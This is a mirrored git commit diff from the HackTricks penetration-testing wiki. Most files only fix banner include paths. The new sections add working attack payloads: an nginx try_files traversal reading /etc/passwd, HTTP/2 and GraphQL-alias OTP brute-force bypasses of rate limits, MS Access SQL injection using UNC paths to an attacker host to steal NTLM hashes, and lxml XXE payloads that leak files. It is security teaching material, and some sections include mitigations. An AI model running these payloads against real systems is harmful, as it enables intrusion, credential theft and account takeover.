maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into research_update_src_network-services-pentesting_pentesting-telnet_20250711_082533

Browse Source
This commit is contained in:
SirBroccoli 2025-07-12 17:11:02 +02:00 committed by GitHub
commit 777109375e
52 changed files with 512 additions and 123 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
src/AI/AI-llm-architecture/0.-basic-llm-concepts.md
View File

@ -1,6 +1,6 @@
# 0. Basic LLM Concepts
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Pretraining
@ -300,4 +300,4 @@ During the backward pass:
- **Accuracy:** Provides exact derivatives up to machine precision.
- **Ease of Use:** Eliminates manual computation of derivatives.
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/AI/AI-llm-architecture/1.-tokenizing.md
View File

@ -1,6 +1,6 @@
# 1. Tokenizing
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Tokenizing
@ -99,4 +99,4 @@ print(token_ids[:50])
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/AI/AI-llm-architecture/2.-data-sampling.md
View File

@ -1,6 +1,6 @@
# 2. Data Sampling
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## **Data Sampling**
@ -241,4 +241,4 @@ tensor([[ 367, 2885, 1464, 1807],
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/AI/AI-llm-architecture/3.-token-embeddings.md
View File

@ -1,6 +1,6 @@
# 3. Token Embeddings
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Token Embeddings
@ -219,4 +219,4 @@ print(input_embeddings.shape) # torch.Size([8, 4, 256])
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

5
src/AI/AI-llm-architecture/4.-attention-mechanisms.md
View File

@ -1,6 +1,6 @@
# 4. Attention Mechanisms
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Attention Mechanisms and Self-Attention in Neural Networks
@ -430,5 +430,4 @@ For another compact and efficient implementation you could use the [`torch.nn.Mu
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/AI/AI-llm-architecture/5.-llm-architecture.md
View File

@ -1,6 +1,6 @@
# 5. LLM Architecture
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## LLM Architecture
@ -702,4 +702,4 @@ print("Output length:", len(out[0]))
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md
View File

@ -1,6 +1,6 @@
# 6. Pre-training & Loading models
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Text Generation
@ -971,4 +971,4 @@ There 2 quick scripts to load the GPT2 weights locally. For both you can clone t
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md
View File

@ -1,6 +1,6 @@
# 7.0. LoRA Improvements in fine-tuning
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## LoRA Improvements
@ -64,4 +64,4 @@ def replace_linear_with_lora(model, rank, alpha):
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md
View File

@ -1,6 +1,6 @@
# 7.1. Fine-Tuning for Classification
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## What is
@ -117,4 +117,4 @@ You can find all the code to fine-tune GPT2 to be a spam classifier in [https://
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md
View File

@ -1,6 +1,6 @@
# 7.2. Fine-Tuning to follow instructions
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
> [!TIP]
> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.
@ -107,4 +107,4 @@ You can find an example of the code to perform this fine tuning in [https://gith
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/AI/AI-llm-architecture/README.md
View File

@ -1,6 +1,6 @@
# LLM Training - Data Preparation
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
**These are my notes from the very recommended book** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **with some extra information.**
@ -99,4 +99,4 @@ You should start by reading this post for some basic concepts you should know ab
7.2.-fine-tuning-to-follow-instructions.md
{{#endref}}
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

3
src/binary-exploitation/arbitrary-write-2-exec/README.md
View File

@ -1,6 +1,5 @@
# Arbitrary Write 2 Exec
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md
View File

@ -52,4 +52,4 @@ Successful exploitation results in remote arbitrary code execution at user privi
- Apple October 2024 Security Update (patch shipping CVE-2024-44236)
https://support.apple.com/en-us/121564
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/array-indexing.md
View File

@ -20,4 +20,4 @@ However he you can find some nice **examples**:
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

2
src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
View File

@ -123,4 +123,4 @@ Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-ca
{{#include /banners/hacktricks-training.md}}
{{#include ../../../banners/hacktricks-training.md}}

4
src/binary-exploitation/ios-exploiting.md
View File

@ -1,6 +1,6 @@
# iOS Exploiting
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
## Physical use-after-free
@ -213,4 +213,4 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) {
With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

4
src/binary-exploitation/libc-heap/README.md
View File

@ -1,6 +1,6 @@
# Libc Heap
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Heap Basics
@ -531,4 +531,4 @@ heap-memory-functions/heap-functions-security-checks.md
- [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/libc-heap/use-after-free/first-fit.md
View File

@ -66,4 +66,4 @@ d = malloc(20); // a
{{#include /banners/hacktricks-training.md}}
{{#include ../../../banners/hacktricks-training.md}}

2
src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md
View File

@ -60,4 +60,4 @@ This approach avoids direct file downloads and leverages familiar UI elements to
- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
- Discord Custom Invite Link Documentation https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

5
src/generic-methodologies-and-resources/threat-modeling.md
View File

@ -1,6 +1,6 @@
# Threat Modeling
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
## Threat Modeling
@ -113,5 +113,4 @@ Now your finished model should look something like this. And this is how you mak
This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack.
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

BIN
src/images/nginx_try_files.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 190 KiB

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
View File

@ -166,11 +166,11 @@ Allow the process to **ask for all the TCC permissions**.
### **`kTCCServicePostEvent`**
{{#include ../../../banners/hacktricks-training.md}}
</details>
{{#include /banners/hacktricks-training.md}}
{{#include ../../../banners/hacktricks-training.md}}

2
src/mobile-pentesting/android-app-pentesting/flutter.md
View File

@ -80,4 +80,4 @@ Flutter itself **ignores device proxy settings**. Easiest options:
- [https://sensepost.com/blog/2025/intercepting-https-communication-in-flutter-going-full-hardcore-mode-with-frida/](https://sensepost.com/blog/2025/intercepting-https-communication-in-flutter-going-full-hardcore-mode-with-frida/)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

1
src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
View File

@ -108,6 +108,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
```bash
docker pull opensecurity/mobile-security-framework-mobsf:latest
docker run -p 8000:8000 --privileged \

2
src/network-services-pentesting/1414-pentesting-ibmmq.md
View File

@ -364,4 +364,4 @@ CONTAINER ID IMAGE COMMAND CRE
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

2
src/network-services-pentesting/pentesting-ntp.md
View File

@ -195,4 +195,4 @@ Entry_2:
- Khronos/Chronos draft (time-shift mitigation)
- chronyc manual/examples for remote monitoring
- zgrab2 ntp module docs
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

5
src/network-services-pentesting/pentesting-web/angular.md
View File

@ -1,6 +1,6 @@
# Angular
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## The Checklist
@ -616,5 +616,4 @@ According to the W3C documentation, the `window.location` and `document.location
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/network-services-pentesting/pentesting-web/django.md
View File

@ -1,6 +1,6 @@
# Django
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Cache Manipulation to RCE
Django's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **If an attacker can gain write access to the cache, they can escalate this vulnerability to RCE on the underlying server**.
@ -76,4 +76,4 @@ Always fingerprint the exact framework version via the `X-Frame-Options` error p
* Django security release "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" 4 Jun 2025.
* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" 11 Aug 2024.
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

5
src/network-services-pentesting/pentesting-web/laravel.md
View File

@ -1,6 +1,6 @@
# Laravel
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
### Laravel SQLInjection
@ -91,7 +91,7 @@ The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
{{#include ../../banners/hacktricks-training.md}}
## Laravel Tricks
@ -283,4 +283,3 @@ The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.
{{#include ../../banners/hacktricks-training.md}}

55
src/network-services-pentesting/pentesting-web/nginx.md
View File

@ -157,6 +157,61 @@ $ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar
Scans for this misconfiguration across systems revealed multiple instances where Nginx variables could be printed by a user. However, a decrease in the number of vulnerable instances suggests that efforts to patch this issue have been somewhat successful.
### Using try_files with $URI$ARGS variables
Following Nginx misconfiguration can lead to an LFI vulnerability:
```
location / {
try_files $uri$args $uri$args/ /index.html;
}
```
In our configuration we have directive `try_files` which is used to check for existence of files in specified order. Nginx will server the first one that it will find. The basic syntax of the `try_files` directive is as follows:
```
try_files file1 file2 ... fileN fallback;
```
Nginx will check for the existence of each file in the specified order. If a file exists, it will be served immediately. If none of the specified files exist, the request will be passed to the fallback option, which can be another URI or a specific error page.
However, when using `$uri$args` variables in this directive, the Nginx will try to look for a file that matches the request URI combined with any query string arguments. Therefor we can exploit this configuration:
```
http {
server {
root /var/www/html/public;
location / {
try_files $uri$args $uri$args/ /index.html;
}
}
}
```
With following payload:
```
GET /?../../../../../../../../etc/passwd HTTP/1.1
Host: example.com
```
Using our payload we will escape the root directory (defined in Nginx configuration) and load the `/etc/passwd` file. In debug logs we can observe how the Nginx tries the files:
```
...SNIP...
2025/07/11 15:49:16 [debug] 79694#79694: *4 trying to use file: "/../../../../../../../../etc/passwd" "/var/www/html/public/../../../../../../../../etc/passwd"
2025/07/11 15:49:16 [debug] 79694#79694: *4 try file uri: "/../../../../../../../../etc/passwd"
...SNIP...
2025/07/11 15:49:16 [debug] 79694#79694: *4 http filename: "/var/www/html/public/../../../../../../../../etc/passwd"
...SNIP...
2025/07/11 15:49:16 [debug] 79694#79694: *4 HTTP/1.1 200 OK
```
PoC againts Nginx using the configuration mentioned above:
![Example burp request](../../images/nginx_try_files.png)
## Raw backend response reading
Nginx offers a feature through `proxy_pass` that allows for the interception of errors and HTTP headers produced by the backend, aiming to hide internal error messages and headers. This is accomplished by Nginx serving custom error pages in response to backend errors. However, challenges arise when Nginx encounters an invalid HTTP request. Such a request gets forwarded to the backend as received, and the backend's raw response is then directly sent to the client without Nginx's intervention.

5
src/network-services-pentesting/pentesting-web/nodejs-express.md
View File

@ -1,6 +1,6 @@
# NodeJS Express
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Cookie Signature
@ -39,5 +39,4 @@ cookie-monster -e -f new_cookie.json -k secret
```
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/network-services-pentesting/pentesting-web/spring-actuators.md
View File

@ -63,9 +63,9 @@ Host: target.com
Connection: close
```
{{#include ../../banners/hacktricks-training.md}}
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

5
src/pentesting-web/dapps-DecentralizedApplications.md
View File

@ -1,6 +1,6 @@
# DApps - Decentralized Applications
{{#include ../../banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
## What is a DApp?
@ -79,6 +79,5 @@ In the scenario **`Mishandling of Asset Classes`**, is explained that the backen
- [https://www.certik.com/resources/blog/web2-meets-web3-hacking-decentralized-applications](https://www.certik.com/resources/blog/web2-meets-web3-hacking-decentralized-applications)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

18
src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
View File

@ -47,13 +47,13 @@ if **name** == "**main**": print('\[DEBUG] Creating requests session') requests\
- [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
```
```
{{#include ../../banners/hacktricks-training.md}}
```
```
{{#include /banners/hacktricks-training.md}}

4
src/pentesting-web/idor.md
View File

@ -80,10 +80,10 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces
* **OWASP ZAP**: Auth Matrix, Forced Browse.
* **Github projects**: `bwapp-idor-scanner`, `Blindy` (bulk IDOR hunting).
{{#include ../banners/hacktricks-training.md}}
## References
* [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants PII](https://ian.sh/mcdonalds)
* [OWASP Top 10 Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
* [How to Find More IDORs Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

73
src/pentesting-web/rate-limit-bypass.md
View File

@ -54,11 +54,74 @@ If the target system applies rate limits on a per-account or per-session basis,
Note that even if a rate limit is in place you should try to see if the response is different when the valid OTP is sent. In [**this post**](https://mokhansec.medium.com/the-2-200-ato-most-bug-hunters-overlooked-by-closing-intruder-too-soon-505f21d56732), the bug hunter discovered that even if a rate limit is triggered after 20 unsuccessful attempts by responding with 401, if the valid one was sent a 200 response was received.
### Tools
---
- [**https://github.com/Hashtag-AMIN/hashtag-fuzz**](https://github.com/Hashtag-AMIN/hashtag-fuzz): hashtag-fuzz is a fuzzing tool designed to test and bypass WAFs and CDNs. By leveraging advanced features such as random User-Agent and header value, random delays, handle multi-threading, selective chunking of wordlists and Round Robin proxy rotation for each chunked, it offers a robust solution for security professionals aiming to identify vulnerabilities in web applications.
### Abusing HTTP/2 multiplexing & request pipelining (2023-2025)
Modern ratelimiter implementations frequently count **TCP connections** (or even individual HTTP/1.1 requests) instead of the *number of HTTP/2 streams* a connection contains. When the same TLS connection is reused, an attacker can open hundreds of parallel streams, each carrying a separate request, while the gateway only deducts *one* request from the quota.
```bash
# Send 100 POST requests in a single HTTP/2 connection with curl
seq 1 100 | xargs -I@ -P0 curl -k --http2-prior-knowledge -X POST \
-H "Content-Type: application/json" \
-d '{"code":"@"}' https://target/api/v2/verify &>/dev/null
```
If the limiter protects only `/verify` but not `/api/v2/verify`, you can also combine **path confusion** with HTTP/2 multiplexing for *extremely* high-speed OTP or credential brute-forcing.
> 🐾 **Tip:** PortSwiggers [Turbo Intruder](https://portswigger.net/research/turbo-intruder) supports HTTP/2 and lets you fine-tune `maxConcurrentConnections` and `requestsPerConnection` to automate this attack.
### GraphQL aliases & batched operations
GraphQL allows the client to send **several logically independent queries or mutations in a single request** by prefixing them with *aliases*. Because the server executes every alias but the rate-limiter often counts only *one* request, this is a reliable bypass for login or password-reset throttling.
```graphql
mutation bruteForceOTP {
a: verify(code:"111111") { token }
b: verify(code:"222222") { token }
c: verify(code:"333333") { token }
# … add up to dozens of aliases …
}
```
Look at the response: exactly one alias will return 200 OK when the correct code is hit, while the others are rate-limited.
The technique was popularised by PortSwiggers research on “GraphQL batching & aliases” in 2023 and has been responsible for many recent bug-bounty payouts.
### Abuse of *batch* or *bulk* REST endpoints
Some APIs expose helper endpoints such as `/v2/batch` or accept an **array of objects** in the request body. If the limiter is placed in front of the *legacy* endpoints only, wrapping multiple operations inside a single bulk request may completely sidestep the protection.
```json
[
{"path": "/login", "method": "POST", "body": {"user":"bob","pass":"123"}},
{"path": "/login", "method": "POST", "body": {"user":"bob","pass":"456"}}
]
```
### Timing the sliding-window
A classic token-bucket or leaky-bucket limiter *resets* on a fixed time boundary (for example, every minute). If the window is known (e.g. via error messages such as `X-RateLimit-Reset: 27`), fire the maximum allowed number of requests **just before** the bucket resets, then immediately fire another full burst.
```
|<-- 60 s window ->|<-- 60 s window ->|
###### ######
```
This simple optimisation can more than double your throughput without touching any other bypass technique.
---
## Tools
- [**https://github.com/Hashtag-AMIN/hashtag-fuzz**](https://github.com/Hashtag-AMIN/hashtag-fuzz): Fuzzing tool that supports header randomisation, chunked word-lists and round-robin proxy rotation.
- [**https://github.com/ustayready/fireprox**](https://github.com/ustayready/fireprox): Automatically creates disposable AWS API Gateway endpoints so every request originates from a different IP address perfect for defeating IP-based throttling.
- **Burp Suite IPRotate + extension**: Uses a pool of SOCKS/HTTP proxies (or AWS API Gateway) to rotate the source IP transparently during *Intruder* and *Turbo Intruder* attacks.
- **Turbo Intruder (BApp)**: High-performance attack engine supporting HTTP/2 multiplexing; tune `requestsPerConnection` to 100-1000 to collapse hundreds of requests into a single connection.
## References
- PortSwigger Research “Bypassing rate limits with GraphQL aliasing” (2023) <https://portswigger.net/research/graphql-authorization-bypass>
- PortSwigger Research “HTTP/2: The Sequel is Always Worse” (section *Connection-based throttling*) (2024) <https://portswigger.net/research/http2>
{{#include ../banners/hacktricks-training.md}}

62
src/pentesting-web/sql-injection/ms-access-sql-injection.md
View File

@ -4,7 +4,7 @@
## Online Playground
- [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format\&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1)
- [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1)
## DB Limitations
@ -127,9 +127,21 @@ IIF((select mid(last(username),1,1) from (select top 10 username from users))='a
In a nutshell, the query uses an “if-then” statement in order to trigger a “200 OK” in case of success or a “500 Internal Error” otherwise. Taking advantage of the TOP 10 operator, it is possible to select the first ten results. The subsequent usage of LAST allows to consider the 10th tuple only. On such value, using the MID operator, it is possible to perform a simple character comparison. Properly changing the index of MID and TOP, we can dump the content of the “username” field for all rows.
### Time Based
### Time-Based (Blind) Tricks
Check [https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN](<https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN>)
Jet/ACE SQL itself does **not** expose a native `SLEEP()` or `WAITFOR` function, so traditional time-based blind injections are limited. However, you can still introduce a measurable delay by forcing the engine to access a **network resource that is slow or does not answer**. Because the engine will try to open the file before returning the result, the HTTP response time reflects the round-trip latency to the attacker-controlled host.
```sql
' UNION SELECT 1 FROM SomeTable IN '\\10.10.14.3\doesnotexist\dummy.mdb'--
```
Point the UNC path to:
* a SMB share behind a high-latency link
* a host that drops the TCP handshake after `SYN-ACK`
* a firewall sinkhole
The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984.
### Other Interesting functions
@ -162,7 +174,7 @@ However, note that is very typical to find SQL Injections where you **don't have
The knowledge of the **web root absolute path may facilitate further attacks**. If application errors are not completely concealed, the directory path can be uncovered trying to select data from an inexistent database.
`http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00`
`http://localhost/script.asp?id=1'+ '+UNION+SELECT+1+FROM+FakeDB.FakeTable%00`
MS Access responds with an **error message containing the web directory full pathname**.
@ -182,7 +194,42 @@ Another way to enumerate files consists into **specifying a database.table item*
`http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00`
Where **name\[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
Where **name[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
### Remote Database Access & NTLM Credential Theft (2023)
Since Jet 4.0 every query can reference a table located in a *different* `.mdb/.accdb` file via the `IN '<path>'` clause:
```sql
SELECT first_name FROM Employees IN '\\server\share\hr.accdb';
```
If user input is concatenated into the part after **IN** (or into a `JOIN … IN` / `OPENROWSET` / `OPENDATASOURCE` call) an attacker can specify a **UNC path** that points to a host they control. The engine will:
1. try to authenticate over SMB / HTTP to open the remote database;
2. leak the web-servers **NTLM credentials** (forced authentication);
3. parse the remote file a malformed or malicious database can trigger Jet/ACE memory-corruption bugs that have been patched multiple times (e.g. CVE-2021-28455).
Practical injection example:
```sql
1' UNION SELECT TOP 1 name
FROM MSysObjects
IN '\\attacker\share\poc.mdb'-- -
```
Impact:
* Out-of-band exfiltration of Net-NTLMv2 hashes (usable for relay or offline cracking).
* Potential remote code execution if a new Jet/ACE parser bug is exploited.
Mitigations (recommended even for legacy Classic ASP apps):
* Add the registry value `AllowQueryRemoteTables = 0` under `HKLM\Software\Microsoft\Jet\4.0\Engines` (and under the equivalent ACE path). This forces Jet/ACE to reject remote paths starting with `\\`.
* Block outbound SMB/WebDAV at the network boundary.
* Sanitize / parameterise any part of a query that may end up inside an `IN` clause.
The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent.
### .mdb Password Cracker
@ -191,8 +238,7 @@ Where **name\[i] is a .mdb filename** and **realTable is an existent table** wit
## References
- [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
- [Microsoft KB5002984 Configuring Jet/ACE to block remote tables](https://support.microsoft.com/en-gb/topic/kb5002984-configuring-jet-red-database-engine-and-access-connectivity-engine-to-block-access-to-remote-databases-56406821-30f3-475c-a492-208b9bd30544)
- [Check Point Research Abusing Microsoft Access Linked Tables for NTLM Forced Authentication (2023)](https://research.checkpoint.com/2023/abusing-microsoft-access-linked-table-feature-to-perform-ntlm-forced-authentication-attacks/)
{{#include ../../banners/hacktricks-training.md}}

2
src/pentesting-web/xss-cross-site-scripting/README.md
View File

@ -1,6 +1,6 @@
# XSS (Cross Site Scripting)
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Methodology

62
src/pentesting-web/xxe-xee-xml-external-entity.md
View File

@ -773,6 +773,65 @@ Take a look to this amazing report [https://swarm.ptsecurity.com/impossible-xxe-
https://github.com/luisfontes19/xxexploiter
{{#endref}}
### Python lxml Parameter-Entity XXE (Error-Based File Disclosure)
> [!INFO]
> The Python library **lxml** uses **libxml2** under the hood. Versions prior to **lxml 5.4.0 / libxml2 2.13.8** still expand *parameter* entities even when `resolve_entities=False`, making them reachable when the application enables `load_dtd=True` and/or `resolve_entities=True`. This allows Error-Based XXE payloads that embed the contents of local files into the parser error message.
#### 1. Exploiting lxml < 5.4.0
1. Identify or create a *local* DTD on disk that defines an **undefined** parameter entity (e.g. `%config_hex;`).
2. Craft an internal DTD that:
* Loads the local DTD with `<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">`.
* Redefines the undefined entity so that it:
- Reads the target file (`<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">`).
- Builds another parameter entity that refers to an **invalid path** containing the `%flag;` value and triggers a parser error (`<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">`).
3. Finally expand `%local_dtd;` and `%eval;` so that the parser encounters `%error;`, fails to open `/aaa/<FLAG>` and leaks the flag inside the thrown exception which is often returned to the user by the application.
```xml
<!DOCTYPE colors [
<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">
<!ENTITY % config_hex '
<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">
%eval;'>
%local_dtd;
]>
```
When the application prints the exception the response contains:
```
Error : failed to load external entity "file:///aaa/FLAG{secret}"
```
> [!TIP]
> If the parser complains about `%`/`&` characters inside the internal subset, double-encode them (`&#x26;#x25;``%`) to delay expansion.
#### 2. Bypassing the lxml 5.4.0 hardening (libxml2 still vulnerable)
`lxml` ≥ 5.4.0 forbids *error* parameter entities like the one above, but **libxml2** still allows them to be embedded in a *general* entity. The trick is to:
1. Read the file into a parameter entity `%file`.
2. Declare another parameter entity that builds a **general** entity `c` whose SYSTEM identifier uses a *non-existent protocol* such as `meow://%file;`.
3. Place `&c;` in the XML body. When the parser tries to dereference `meow://…` it fails and reflects the full URI including the file contents in the error message.
```xml
<!DOCTYPE colors [
<!ENTITY % a '
<!ENTITY % file SYSTEM "file:///tmp/flag.txt">
<!ENTITY % b "<!ENTITY c SYSTEM 'meow://%file;'>">
'>
%a; %b;
]>
<colors>&c;</colors>
```
#### Key takeaways
* **Parameter entities** are still expanded by libxml2 even when `resolve_entities` should block XXE.
* An **invalid URI** or **non-existent file** is enough to concatenate controlled data into the thrown exception.
* The technique works **without outbound connectivity**, making it ideal for strictly egress-filtered environments.
#### Mitigation guidance
* Upgrade to **lxml ≥ 5.4.0** and ensure the underlying **libxml2** is **≥ 2.13.8**.
* Disable `load_dtd` and/or `resolve_entities` unless absolutely required.
* Avoid returning raw parser errors to the client.
## References
